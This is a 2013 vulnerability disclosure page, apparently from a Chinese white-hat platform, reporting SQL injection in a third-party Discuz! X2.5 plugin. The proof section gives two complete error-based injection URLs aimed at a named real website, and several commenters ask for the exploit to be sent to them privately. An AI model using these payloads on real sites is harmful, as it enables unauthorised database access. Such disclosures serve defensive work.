漏洞概要
关注数(24)
关注此漏洞
漏洞标题:DZ X2.5某插件高危注入第一时间发布哦
提交时间:2013-04-14 11:35
修复时间:2013-05-29 11:36
公开时间:2013-05-29 11:36
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2013-04-14: 细节已通知厂商并且等待厂商处理中
2013-04-16: 厂商已经确认,细节仅向厂商公开
2013-04-26: 细节向核心白帽子及相关领域专家公开
2013-05-06: 细节向普通白帽子公开
2013-05-16: 细节向实习白帽子公开
2013-05-29: 细节向公众公开
简要描述:
DZ X2.5高危注入 第一时间发布哦 求奖金 或者移动硬盘啥的!
详细说明:
DZ X2.5高危注入 第一时间发布哦 求奖金 求奖金 或者移动硬盘啥的!
闲的无聊 发现的!
漏洞证明:
http://www.gzcity.com/jiaoyou.php?pid=1'%20or%20@`'`%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@`'`%20and%20'1'='1
http://www.gzcity.com/jiaoyou.php?pid=1'%20or%20@`'`%20and(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,unhex(hex(user())),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20or%20@`'`%20and%20'1'='1
修复方案:
不想说了 礼物免不了啦 我的QQ:1759462728
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:5
确认时间:2013-04-16 17:56
厂商回复:
感谢关注Discuz!的产品,该问题之前已有人反馈过,并已发布补丁,这个问题威胁来源是第三方插件
最新状态:
暂无
漏洞评价:
评论
-
2013-04-14 11:52 |
姿势不行 ( 路人 | Rank:22 漏洞数:7 | 我是爱卖萌的小阿狸呀http://www.qinqinyo....)
-
2013-04-14 11:55 |
Clouds ( 实习白帽子 | Rank:55 漏洞数:12 | test)
-
2013-04-14 12:01 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
-
2013-04-14 12:02 |
VIP ( 普通白帽子 | Rank:759 漏洞数:100 )
目测是这个http://1ic-nt.discuz.net/thread-3195274-1-1.html
-
2013-04-14 12:07 |
陈再胜 ( 普通白帽子 | Rank:121 漏洞数:13 | 微博收收听~~~●﹏●)
@VIP 应该不是把~~这个是1月多的了,为毛现在才提交······
-
2013-04-14 12:13 |
Breaker ( 路人 | Rank:12 漏洞数:1 )
-
2013-04-14 12:21 |
疯狗 
( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2013-04-14 12:43 |
ctgpmc ( 路人 | Rank:15 漏洞数:2 | 代码审计/渗透测试)
-
2013-04-14 13:19 |
null ( 路人 | Rank:15 漏洞数:2 | 左岸是无法忘却的回忆,右岸是值得把握的青...)
-
2013-04-14 13:38 |
txcbg ( 普通白帽子 | Rank:391 漏洞数:53 | 说点什么呢?)
-
2013-04-14 13:47 |
P w ( 实习白帽子 | Rank:72 漏洞数:12 | -这家伙很懒,什么都没有留下。其实我真的很...)
-
2013-04-14 15:52 |
erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)
-
2013-04-14 17:08 |
黑夜 ( 路人 | Rank:2 漏洞数:1 )
-
2013-04-14 18:44 |
saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)
-
2013-04-14 18:49 |
梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)
-
2013-04-14 19:04 |
saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)
-
2013-04-14 21:03 |
小鸡鸡 ( 实习白帽子 | Rank:40 漏洞数:4 )
-
2013-04-14 21:44 |
小色 ( 路人 | Rank:0 漏洞数:1 | 撸的一手好管)
-
2013-04-14 23:27 |
saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)
-
2013-04-15 09:26 |
viekst ( 实习白帽子 | Rank:64 漏洞数:11 )
-
2013-04-15 13:19 |
saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)
-
2013-04-15 14:47 |
射不出来 ( 路人 | Rank:7 漏洞数:4 | 我是来混的...)
-
2013-04-16 10:54 |
saviour.inc ( 路人 | Rank:5 漏洞数:1 | 家乡网)
-
2013-04-16 12:16 |
陈再胜 ( 普通白帽子 | Rank:121 漏洞数:13 | 微博收收听~~~●﹏●)
@saviour.inc →_→私聊发我exp把~~~~丢给厂商太浪费了
-
2013-04-16 12:28 |
saviour.inc ( 路人 | Rank:5 漏洞数:1 | 家乡网)
-
2013-04-16 15:23 |
小鸡鸡 ( 实习白帽子 | Rank:40 漏洞数:4 )
@saviour.inc 邮箱1321212165@qq.com 大哥来一份
-
2013-04-16 17:22 |
erevus ( 普通白帽子 | Rank:177 漏洞数:30 | Hacked by @ringzero 我錯了)
@saviour.inc kaede.everus@163.com来一份
-
2013-04-16 18:04 |
saviour.inc ( 路人 | Rank:5 漏洞数:1 | 家乡网)
-
2013-04-16 19:08 |
saviour.inc ( 路人 | Rank:5 漏洞数:1 | 家乡网)
这洞在我的空间 公开了 大家可以去看!http://user.qzone.qq.com/1759462728/
-
2013-04-17 11:26 |
包子 ( 实习白帽子 | Rank:33 漏洞数:6 | 共同交流,共同进步)
-
2013-04-17 17:43 |
Breaker ( 路人 | Rank:12 漏洞数:1 )
-
2013-04-17 18:34 |
银冥币 ( 实习白帽子 | Rank:35 漏洞数:19 | "/upload/avatar/avatar_251_b.jpg" />)
-
2013-04-17 20:33 |
saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)
-
2013-05-26 19:56 |
少校 ( 实习白帽子 | Rank:40 漏洞数:5 | 别开枪,自己人!)
-
2013-08-07 17:00 |
saviour ( 普通白帽子 | Rank:188 漏洞数:29 | Saviour.Com.Cn 网站正在备案中)
